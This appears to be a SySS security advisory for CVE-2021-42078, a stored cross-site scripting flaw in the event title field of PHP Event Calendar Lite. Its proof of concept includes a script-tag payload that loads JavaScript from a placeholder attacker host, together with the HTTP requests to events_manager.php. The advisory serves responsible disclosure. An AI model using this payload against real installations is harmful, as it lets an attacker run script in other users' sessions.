Product:                   PHP Event Calendar
Manufacturer:              Kayson Group Ltd.
Affected Version(s):       PHP Event Calendar Lite edition
Tested Version(s):         PHP Event Calendar Lite edition
Vulnerability Type:        Cross-site Scripting (CWE-79)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2021-08-09
Public Disclosure:         2021-11-04
CVE Reference:             CVE-2021-42078
Authors of Advisory:       Erik Steltzner, SySS GmbH
                            Maurizio Ruchay, SySS GmbH



PHP Event Calendar is a multi-user web application designed
to manage and publish calendar events.

The manufacturer describes the product as follows (see [1] and [2]):

"PHP Event Calendar features day, week, month, year, agenda, and
resource views. It includes built-in reminder support so you can
deliver full-featured event scheduling management systems in
the shortest possible time."

"PHP Event Calendar is a out-of-box web calendar/scheduler solution.
It will run on web servers that support PHP 5.3 and higher."


Vulnerability Details:

The title of a calendar event is vulnerable to persistent cross-site 
scripting (XSS).

For example, the following title causes an event to be stored with a 
JavaScript code. As soon as some user opens the event in the detail 
view, the
JavaScript code stored on the attacker server will be executed.

<script src="http://<attacking-machine>/XSS.js"/>

This can be exploited by an adversary in multiple ways. For example, to
perform actions on the page in the context of other users.


Proof of Concept (PoC):

Adding an event with a malicious title:

POST /server/ajax/events_manager.php HTTP/1.1

HTTP/1.1 200 OK

When a victim opens the event in the detail view, the following request
loads the malicious code:

POST /server/ajax/events_manager.php HTTP/1.1

HTTP/1.1 200 OK
      "title":"<script src=\"http:\/\/<attacking-machine>\/XSS.js\"\/>",

As soon as the victim's browser renders this response, the malicious
script "XSS.js" is loaded and executed.



To prevent cross-site scripting attacks, all user-provided input should be
validated, and control characters should be masked in a context-sensitive


Disclosure Timeline:

2021-07-29: Vulnerability discovered
2021-08-09: Vulnerability reported to manufacturer
2021-11-04: Public disclosure of vulnerability



[1] Product Website for PHP Event Calendar
[2] Documentation Website for PHP Event Calendar
[3] SySS Security Advisory SYSS-2021-049
[4] SySS Responsible Disclosure Policy